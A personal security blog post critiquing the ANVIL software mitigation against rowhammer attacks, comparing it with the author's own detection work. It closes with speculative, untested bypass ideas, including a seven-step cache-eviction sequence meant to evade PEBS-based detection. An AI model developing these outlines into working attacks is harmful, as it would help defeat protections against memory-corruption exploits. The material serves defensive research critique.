My ramblings
No technical
stuff in here. If you are here for the tech skip to introduction.
First up the
KASRL blog part 2 is in progress. It might take a while because there is a bit
more meat on that bone than I’d expected and I want to do it right. But for now
I hope you’ll enjoy this more speculative row hammer related post.
My all time
favorite paper is [1]“Factors affecting voluntary alcohol consumption in the
albino rat” by Kalervo Eriksson. I havn’t read it. But everything about the
title fascinates me. Why Albino rats? What factors? Why does it intrigue me?
Alcoholic rats? Binge drinking or occasional relaxation? Beer or whiskey? What
is a albino rat hangover like? And most of all what was the motivation of the
author? I shall not know anytime soon because I enjoy pondering these questions
too much.
The second on my list is one I’ve actually read. [2][“Leassons from
the Bell Curve” by James Heckman. I know James Heckman’s stuff pretty well
because I spend a few years studying micro-econometrics and he is an amazing
econometrician and was awarded nobel prize for his work in this area. But this
paper stood out to me. It’s not on economics (at least directly). It was not a
particular original paper, since it took it’s base in a controversial book. The
book, “The bell curve”, was about the
influence and distribution of intelligence. The critic this book received (and
it was a lot) was mostly politically correct dissent that did not engage with
the evidence based research presented in the book. Heckman took the same data,
and systematically took it apart with state-of-the-art econometric methods
dismissing some conclusions, confirming others with no regard to the political
correctness of his results. It is in my mind too rare that this kind of papers
is published yet it is very much at the core of science to check the robustness
of other people’s results, to apply new methods to old data. And that paper is
the inspiration for me when I in this blog critic other people’s work.
Introduction
The subject
of this blog post is a paper by [1] Aweke et al. called “ANVIL: Software-Based
Protection Against Next-Generation Rowhammer Attacks”. (it can be found here: http://iss.oy.ne.ro/) In it they first develop
a cache eviction based row hammer attack to supplement the classic clflush –
much along the lines of the rowhammer.js attack. Then they developed a mitigation method for
the row hammer attack and I’ll spend some time looking into their work below. They
test this method against the classic row hammer attack using clflush and the
cache eviction based attack. In this blog post I’ll first shortly summarize the
paper, then comment on it and finally look into how the mitigation may be
bypassed by next generation row hammer attacks. I shall not develop these next
generation attacks in full, so it is somewhat speculative if they would
actually work, but I hope to point fingers in directions where row hammer could
go in response to mitigations such as the one in this paper. There are a number
of reasons for this. First is that I don’t actually have access to their
mitigation and thus cannot test against it. Secondly, I have to borrow a
computer to flip bits as mine and my wife both do not seem to get bit flips
when row hammering. Third is that I am somewhat reluctant to fully develop new
attacks for which there currently is no protection. Finally and most
importantly I’m a blogger and I’m doing this stuff after hours between all my
other hobbies and obligations – it’s simply not within my time budget .
Despite of
any critique in here I should make it very clear beforehand that I really like
the paper and think it is an important contribution. If it wasn’t I wouldn’t
spend time on it. The method certainly passes the litmus test of raising
attacker cost and we must always remember that perfection is the enemy of good.
Unfortunately this blog post turned out a bit more technical than I would’ve
liked it to. To really engage with this blog post you need some knowledge of
row hammer, performance counters and the cache subsystem.. Regular readers of
my blog should be ok.
Ultra short summary of the
Anvil paper
The papers results are:
1. Bit
flips can be caused in 15ms.
2. Because
of 1, The suggested mitigation of increasing the refresh rate on D-Ram from a
refresh every 64ms to one every 32ms is not a sufficient protection.
3. Row
hammer can be done with out clflush. [5]Seaborn & Dullien suggested
limiting access to clflush to kernel mode and google removed support for the
clflush instruction in the NaCL sandbox. The authors show that this is not a
viable solution because one cause cache evict and thereby bypass the cache to access physical memory fast enough to cause
row hammering.
4.
Then they go on to develop a software mitigation:
Anvil. Anvil works in 3
stages:
a. Stage
1: Using the fact that high rates of cache misses in the last level cache are
rare on modern computers they use the LLC Cache miss performance counter as a first check if an
attacker is row hammering. If LLC Cache misses exceeds a threshold per time unit
Anvil continues to the second phase, if not it just continues monitoring. In
addition to monitoring LLC Cache misses, it also monitors the amount of
MEM_LOAD_UOPS_RETIRED_LLC_MISS this value gets used in the second stage.
b.
Stage 2: In the second stage Anvil uses the PEBS
performance events to sample loads and/or stores. These performance counters can samples
load/stores above a given latency. The authors set this latency to match that
of a cache miss. The advantage of using these performance counters is that they
provide the load/store address. This allows the authors to identify if the same
rows are being used again and again or if the access pattern is all across
memory and thus benign. If it’s not benign they proceed to stage 3. To cut down
on overhead of sampling stores with PEBS they only sample stores if the
MEM_LOAD_UOPS_RETIRED_LLC_MISS counter from the first stage was significant
smaller than the LLC misses. The thought here is if they are seeing only loads
in the first stage a potential attack is not driven by stores.
c.
State 3: Anvil has at this point detected a row hammer
attack and will now thwart it. Because
reading a row will automatically refresh it, Anvil uses the addresses found in
the second stage to figure out which rows are being hammered and then issues a
read to neighboring rows.
5. The
analysis of Anvil finds that it’s comes at a low performance cost. That the
first stage is cheap performance wise and that it’s rare that Anvil proceeds to
stage 2.
The short commentary
Regular readers of this blog cannot be surprised about
most of what is found in the Anvil paper.
1. The 15ms the authors take to cause a bitflip seems to be a bit high. [4] Yoongu et al. states that a refresh rate below 8.2ms is required to entirely kill row hammering, which again suggests that bit flips under “favorable” circumstances can be caused significantly faster.
2. It follows logically from 1 that lowering the refresh rate to 32ms does not completely deal with row hammer. Nishat Herath of Qualys and I pointed this out at Black hat and our slides and further comments can be found in my “Speaking at black hat” post..
3. That bit flips can be caused without CLFLush is also not a surprise. It confirms [6] Gruss, Maurice & Mangard, which went a step further and generated optimal cache eviction strategies and implemented a java based attack.
4. Anvil:
a. Stage 1: This is exactly the same approach that I took in my first two blog posts on row hammer detection and mitigation which formed the basis for Nishat and my talk at Black hat. All come to the result that there is a high correlation between this perf counter and row hammer [7] Gruss,Maurice&Wagner took it one step further and adjusted for over all memory activity and they too got pretty good results. I noticed false positives in my work with this method and this result is reproduced by the Anvil authors.
b. Stage 2: Here we have the first big new contribution of the paper and it’s a great one. It certainly opens up new ways to think about cache attack detection and mitigations. It is a natural connection between cache misses and actual row hammer because you get addresses. I shall examine this method in more details below.
c. Stage 3: The method of mitigation by reading neighboring rows was suggested by Nishat and myself at at our black hat talk. We only confirmed that reading victim rows would protect against row hammer, but we didn’t actually use this in our mitigation work and instead suggested causing a slow down when too many cache misses occurred. The reason is that we saw no good ways of actually inspecting which addresses where being used. I must honestly say that I missed the PEBS while designing this mitigation and found no good way of connecting a cache miss to an address. I shall analyze below to what extend Anvil succeeds at this. We suggested the slow down as a “soft response” in light of rare false positives in a.
5. The analysis of the performance penalty of Anvil relatively closely follows the results I had testing our mitigation system from black hat. I used an entirely different set of test applications and came to the same conclusions. Thus I can confirm that Anvil is likely to have a very low performance impact, that should be acceptable for most systems. The first stage is nearly free and benign applications that get miss detected in the first stage are rare. I should note here that the Aweke et al. use h264ref to test Anvil and find that this video encoder rarely triggers the first stage. However h264ref is not representative of video encoders for multiple reasons. I had in my testing problems with a h264 video encoder (that I’ve coauthored) generating too many cache misses a great many times. The h264ref is written to be portable and easily understood. Production video encoders are much more streamlined in their memory access and particularly the heavy use of streaming instructions makes actual memory speed the limiting factor in many operations – especially motion search. Modern video encoders also utilizes threading much more and that puts the L3 cache under much more pressure than the h264ref will do. Also to evaluate a video encoders impact on memory access it’s important to use the right input material – this is because video encoders tend to shortcut additional calculation if it finds something it estimates to be “good enough” ´. Never-the-less this is probably mostly a personal comment – the authors conclusions generally match my results.2.
Anvil and future row hammer
attacks
Aweke et al.
conclude: “We feel that these results show it is viable to protect current and
future systems against row hammer attacks”. As always it’s hard to tell what’s
in the future, but my understanding of next-generation attacks is that they
adapt to mitigation methods. In this section I shall outline what I think are
weaknesses in Anvil that attacks could exploit in the future. Unfortunately I end up being a lot more pessimistic. Even if the authors are right I’ll still
prefer a hardware solution such as pTTR or PARA. The reason for this is that
I’m a strong believer of fixing problems at their root cause. The cause of row
hammer is a micro architectural problem and it should be fixed in micro
architecture. Also we should consider that D-Ram is used in other devices than
modern x86 computers. That said until we see such a solution, software might be
the only solution and Anvil or other solutions certainly are options to fill the
void.
My first source of pessimism is my work on the
cache-coherency way of activating rows. I
havn’t actually tested but I think it may bypass LLC cache miss counter as the
entry for hammering never actually leaves the cache. See my blog post on MESI
and rowhammer for more details.I Now I don’t know if that method is fast enough
for row hammer but if it is it may affect all suggested software solutions thus
far, because all three hinge on the LLC_MISS counter. Should this attack
actually be fast enough and should it indeed avoid LLC cache misses, it is
probably not a fatal problem. There are performance counters that cover this
kind of stuff and it’s a rare event in benign software and thus we should be
able to work around it. And they could be implemented as a parallel option in
stage 1 of Anvil.
Aweke et al. suggest
using a 6ms sampling for stage 1 and a 6ms sampling for stage 2. This means
they spend 12ms detecting an attack before they respond. With [4] suggesting
that a refresh rate of 8.2 ms is required to rule out row hammer attacks this
might actually give an attacker enough time to flip a bit. Aweke et al. suggest
that 110k activations is required to cause bit flips, if we multiply these
numbers by the 55ns activation interval reported by [4] we end up with a lower
bound on row hammering of only ~6ms. However the authors also evaluate a
version of Anvil with 2ms intervals and conclude this version would work as well, despite
slightly more overhead. They call it Anvil-heavy It would seem that Anvil-Heavy
is the more relevant version of Anvil if the row hammer mitigation is supposed
to be “perfect”. It is conceivable that the crosstalk effects behind row hammer
will become more serious with time as memory gets denser and faster. How
much wiggle room Anvil has to compensate beyond Anvil-Heavy is in my opinion an
open question the two factors being how much over head lowering the intervals
below 2 ms will cause through false prediction in stage 1 and for more sampling
in stage 2 but also the shorter sampling interval in stage 2 can only be
shorted so much before insufficient samples are collected to determine row
locality of the hits. All this said I think the article underestimates the
performance cost of a truly secure implementation, but they might still be
acceptable.
It should be noted there is a good chance an attacker
can gain a bit of introspection into Anvil. My guess is that if the attacker monitors latency in
(say) a classic clflush row hammer attack he’ll be able to see when Anvil
switches to the second stage. The argumentation is that sampling with PEBS
causes latency on the instructions being sampled – typically interrupting the
process would be in the order of magnitude of 4000 CLK’s including only
rudimentary handling – that is much less than Anvil actually has to do. There
is a reason Aweke et. al sees performance penalties in the second stage. It is
important to note that with latencies in this order of magnitude anomalies can
be detected by the attacker at very little cost, thus hardly disturbing the
attack itself.
An example of
how this could be used to bypass Anvil hinges on an implementation detail. Anvil
does not sample store operations in the 2nd stage if store operations where
rare in the first stage. This leaves room for an attacker to switch from a load
based attack to a store based attack methodology mid attack and thus outwit
stage 2. This again isn’t a fatal flaw by any means and can be worked around by
simply always sampling stores – and the overhead should be acceptable given
that it’s rare in real life that the 2nd stage even engages. But again the
paper is probably underestimating the performance cost required for “perfect
protection”. However I don’t think this
example is the real issue. The issue is that an attacker can adapt to the
defense.
The last
issue with Anvil that I’ll cover in this blog post is that Anvil assumes that a
high latency instruction has high latency because of loads and stores it does.
While this holds true for traditional attacks, this is not a given. The cache
subsystem and the hardware prefetchers are examples of off core subsystems
where access directly to D-Ram can originate without being part of loads and
store initiated by an instruction in the core. Here is an example of how PEBS
can be tricked. I’ll keep it simple by only accessing memory from one row, but
it should be clear how a second row could be added to do row hammering.
- 1. Let A be a cache set aligned address to an aggressor row
- 2. Let E be an eviction set for A. E consist of E1..EN where N is the number of ways and E1..EN is not in the same dram bank as A
- 3. Prime A’s cache set with E.
- 4. Use clflush to remove a way from of E thus creating a way in the set marked as Invalid
- 5. Use a store operation (mov [A],1) to set the invalid cache way to Modified, containing A.
- 6. Now Evict A using E causing a writeback of A.
- 7. Repeat from 4.
As for 2.
This is easily done – there are plenty of addresses belonging E besides A to
pick from. 3. This is standard stuff. 4. We may get high latency here but even
if clflush is a store operation (which it may or may not be) it will not use A
and thus an irrelevant address will be stored by PEBS – also the latency for a
clflush is around 115 CLK’s (on my wife’s Sandy Bridge), significantly below
that of a cache miss. Further it might not actually be needed. 5. A 4 byte
store operation does not load the rest of the cache line from D-RAM (at least
on my wife’s Sandy Bridge), thus the latency is low and will not be recorded by
Anvil’s PEBS. 6. We do get latency here but we’ll cause a write back for A, but PEBS will
record E which is irrelevant. Such a scheme may be too slow for actual row
hammering, but I don’t think it is. After all the normal eviction
based attack is 70% faster than the requirement of 110k activations in a 64ms
refresh interval according to [3]. Even if this turns out to be to slow for row
hammering, it demonstrates that the second stage of Anvil may have severe
deficits.
Finally we can
use the classic clflush method during the 1st phase of Anvil as noted above.
I can come up with other scenarios where this (and in
some cases the other) software row hammer mitigation may fail, but I think I’ve
placed enough on the table for this blog post.
Conclusion
The current
implementation of Anvil is a low overhead row hammer mitigation which will work
well against attacks that is not engineered to bypass it. Should Anvil become
widespread it is likely that next generation methods of row hammering exists
that are capable of bypassing the second stage of Anvil row hammer. Thus if I
were to choose a method for row hammer mitigation on a mission critical system
I would go with suggestion made by [7] triggering a simple slow down in event of a
detection. It has the benefits of thwarting some cache side channel attacks in
the process. While this has a much higher performance penalty on a few
applications, it’ll run at the same performance cost as Anvil in most real
world scenarios and it’s simplicity offers less attack surface for engineered
attacks.
Literature
[1] Kalervo
Eriksson,”Factors affecting voluntary alcohol consumption in the albino rat”;
Annales Zoologici Fennici; Vol. 6, No. 3 (1969), pp. 227-265
[2] Heckman,
JamesJ.: “Lessons from the Bell Curve”,Journal of Political Economy, Vol. 103,
No. 5 (Oct., 1995), pp. 1091-1120
[3] Zelalem
Birhanu Aweke, Salessawi Ferede Yitbarek, Rui Qiao, Reetuparna Das, Matthew
Hicks, Yossi Oren, Todd Austin:”ANVIL: Software-Based Protection Against
Next-Generation Rowhammer Attacks”
[4] Yoongu Kim, R. Daly, J. Kim, C. Fallin, Ji
Hye Lee,Donghyuk Lee, C. Wilkerson, K. Lai, and O. Mutlu. Flipping Bits in
Memory Without Accessing Them: An Experimental Study of DRAM Disturbance
Errors. In Computer Architecture (ISCA), 2014 ACM/IEEE 41st International
Symposium on, pages 361–372, June 2014.44 4
[5] Mark
Seaborn and Thomas Dullien. Exploiting the DRAM rowhammer bug to gain kernel
privileges. March 2015
[6] D. Gruss,
C. Maurice, and S. Mangard.” Rowhammer.js: A Remote Software-Induced Fault
Attack in JavaScript.” ArXiv e-prints, July 2015.
[7] Gruss,
Maurice and Wagner: “Flush+Flush: A Stealthier Last-Level Cache Attack”
http://arxiv.org/abs/1511.04594